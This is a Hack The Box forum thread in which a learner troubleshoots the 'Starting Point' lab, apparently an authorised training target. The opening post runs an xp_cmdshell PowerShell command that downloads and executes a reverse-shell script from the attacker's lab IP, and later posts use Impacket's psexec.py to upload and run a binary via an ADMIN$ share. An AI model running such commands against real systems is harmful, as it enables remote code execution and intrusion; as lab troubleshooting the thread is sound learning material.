Starting Point reverse shell through xp_cmdshell

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.218/shell.ps1\");""
output


Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found."
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.218/sh ...
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException
NULL

Comments

  • The error message implies that you aren't serving a file called shell.ps1 on your server.

    Make sure wherever you are running the server from has shell.ps1 in the same folder.

    This might also be useful https://forum.hackthebox.eu/discussion/comment/77470

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/
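
Added example, not part of the original thread: it reproduces the 404 from the first post by serving an empty folder with the same static file handler that `python3 -m http.server` uses, then requesting the file again once it exists. The names `QuietHandler`, `fetch_status` and `demo` are made up for illustration, a temporary directory stands in for the folder the server was started from, and a loopback ephemeral port replaces port 80.

```python
import functools
import http.server
import tempfile
import threading
import urllib.error
import urllib.request
from pathlib import Path


class QuietHandler(http.server.SimpleHTTPRequestHandler):
    """Static file handler (what `python3 -m http.server` uses), minus logging."""

    def log_message(self, fmt, *args):
        pass


def fetch_status(url):
    """GET url without any proxy and return the HTTP status, errors included."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    try:
        with opener.open(url, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def demo(filename="shell.ps1"):
    """Return (status before, status after) the file exists in the served folder."""
    with tempfile.TemporaryDirectory() as root:  # stands in for the server's cwd
        handler = functools.partial(QuietHandler, directory=root)
        server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
        threading.Thread(target=server.serve_forever, daemon=True).start()
        url = f"http://127.0.0.1:{server.server_address[1]}/{filename}"
        try:
            before = fetch_status(url)  # folder is empty: no such file
            Path(root, filename).write_text("# constructed placeholder\n")
            after = fetch_status(url)   # same URL, file now present
        finally:
            server.shutdown()
            server.server_close()
    return before, after


if __name__ == "__main__":
    print(demo())
```

The server resolves the request path relative to the directory it serves, so the same URL flips from 404 to 200 as soon as the file is present in that folder.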

  • I tried that thread earlier but nothing worked.
    Also, how do I put the file on the server?

    Thank you

  • @TheAnarchist21 said:

    I tried that thread earlier but nothing worked.
    Also, how do I put the file on the server?

    Ok - just to check I understand the situation:

    • is your IP address (tun0 interface) 10.10.14.218?
    • are you running a webserver on port 80, possibly along the lines of python3 -m http.server 80 or python -m SimpleHTTPServer 80 ?
    • do you have a file called shell.ps1 in the same folder as where you have started the server?

    TazWake


  • Yes, my IP address is 10.10.14.218
    python -m http.server 80
    Yes, I redid everything from the start and it worked, I don't know how.
    Thank you.
    Although I'm stuck now at psexec.py; it's saying that it cannot be found, or no such file or directory.

  • So when it says the file can't be found, it generally means some element of the path is incorrect.

    If you are running this on Linux you may (depending on your OS) need to specify the exact location. You can find this with something like locate psexec.py or which psexec.py or even find (find / -name "psexec.py" 2>/dev/null).

    Then if it isn't on your path, you can invoke it by using the full path - for example if it was in /usr/share/some/folder/ you could run it with /usr/share/some/folder/psexec.py

    It may also need python first - so some trial and error is needed.

    TazWake


  • I located the file
    and I followed the tutorial

    python3 psexec.py [email protected]

    Traceback (most recent call last):
    File "psexec.py", line 10, in <module>
    import src
    ModuleNotFoundError: No module named 'src'
    This was the result.
    Thank you again.

  • @TheAnarchist21 said:

    I located the file
    and I followed the tutorial

    Awesome

    python3 psexec.py [email protected]

    Traceback (most recent call last):
    File "psexec.py", line 10, in <module>
    import src
    ModuleNotFoundError: No module named 'src'
    This was the result.
    Thank you again.

    So, I suspect this is a version of psexec.py that is set for python2.

    There are a few things to try:

    • first, the default response to a missing python module should be to try and install it (start with pip install src and see if that works)
    • if that doesn't help, try python2 psexec.py [email protected]
    • if that doesn't help, try to reinstall the impacket tools.

    TazWake


  • So this happened:

    [email protected]:/home/kali/Documents/HackTheBox# python3 psexec.py
    Traceback (most recent call last):
    File "psexec.py", line 10, in <module>
    import src
    ModuleNotFoundError: No module named 'src'
    [email protected]:/home/kali/Documents/HackTheBox#
    [email protected]:/home/kali/Documents/HackTheBox# pip install src
    Collecting src
    Downloading src-0.0.7.zip (6.3 kB)
    Building wheels for collected packages: src
    Building wheel for src (setup.py) ... error
    ERROR: Command errored out with exit status 1:
    command: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"'; file='"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(file);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, file, '"'"'exec'"'"'))' bdist_wheel -d /tmp/pip-wheel-xy366zqw
    cwd: /tmp/pip-install-wqk5cigy/src/
    Complete output (41 lines):
    running bdist_wheel
    running build
    running build_py
    creating build
    creating build/lib
    creating build/lib/src
    copying src/__init__.py -> build/lib/src
    running egg_info
    writing src.egg-info/PKG-INFO
    writing dependency_links to src.egg-info/dependency_links.txt
    writing entry points to src.egg-info/entry_points.txt
    writing requirements to src.egg-info/requires.txt
    writing top-level names to src.egg-info/top_level.txt
    reading manifest file 'src.egg-info/SOURCES.txt'
    reading manifest template 'MANIFEST.in'
    writing manifest file 'src.egg-info/SOURCES.txt'
    Traceback (most recent call last):
    File "<string>", line 1, in <module>
    File "/tmp/pip-install-wqk5cigy/src/setup.py", line 70, in <module>
    setup(
    File "/usr/lib/python3/dist-packages/setuptools/__init__.py", line 163, in setup
    return distutils.core.setup(**attrs)
    File "/usr/lib/python3.8/distutils/core.py", line 148, in setup
    dist.run_commands()
    File "/usr/lib/python3.8/distutils/dist.py", line 966, in run_commands
    self.run_command(cmd)
    File "/usr/lib/python3.8/distutils/dist.py", line 985, in run_command
    cmd_obj.run()
    File "/usr/lib/python3/dist-packages/wheel/bdist_wheel.py", line 225, in run
    install = self.reinitialize_command('install',
    File "/usr/lib/python3/dist-packages/setuptools/__init__.py", line 217, in reinitialize_command
    cmd = _Command.reinitialize_command(self, command, reinit_subcommands)
    File "/usr/lib/python3.8/distutils/cmd.py", line 305, in reinitialize_command
    return self.distribution.reinitialize_command(command,
    File "/usr/lib/python3.8/distutils/dist.py", line 950, in reinitialize_command
    for sub in command.get_sub_commands():
    File "/usr/lib/python3.8/distutils/cmd.py", line 324, in get_sub_commands
    if method is None or method(self):
    File "/usr/lib/python3.8/distutils/command/install.py", line 675, in has_lib
    return (self.distribution.has_pure_modules() or
    AttributeError: 'NoneType' object has no attribute 'has_pure_modules'


    ERROR: Failed building wheel for src
    Running setup.py clean for src
    Failed to build src
    Installing collected packages: src
    Running setup.py install for src ... error
    ERROR: Command errored out with exit status 1:
    command: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"'; file='"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(file);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, file, '"'"'exec'"'"'))' install --record /tmp/pip-record-76hb4euk/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/src
    cwd: /tmp/pip-install-wqk5cigy/src/
    Complete output (2 lines):
    running install
    You've probably made a mistake here and are trying to install from a 'src' directory which doesn't exist.
    ----------------------------------------
    ERROR: Command errored out with exit status 1: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"'; file='"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(file);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, file, '"'"'exec'"'"'))' install --record /tmp/pip-record-76hb4euk/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/src Check the logs for full command output.

    thanks again XD

  • Also I tried python2 it didn't work.

  • Ok, then it looks like it's the third option. I don't know what else to suggest.

    TazWake


  • Okay thank you so much.

  • python3.8 psexec.py [email protected]
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    Password:
    [*] Requesting shares on 10.10.10.27.....
    [*] Found writable share ADMIN$
    [*] Uploading file IiPAmKEF.exe


    and it pauses; it doesn't execute the other operations
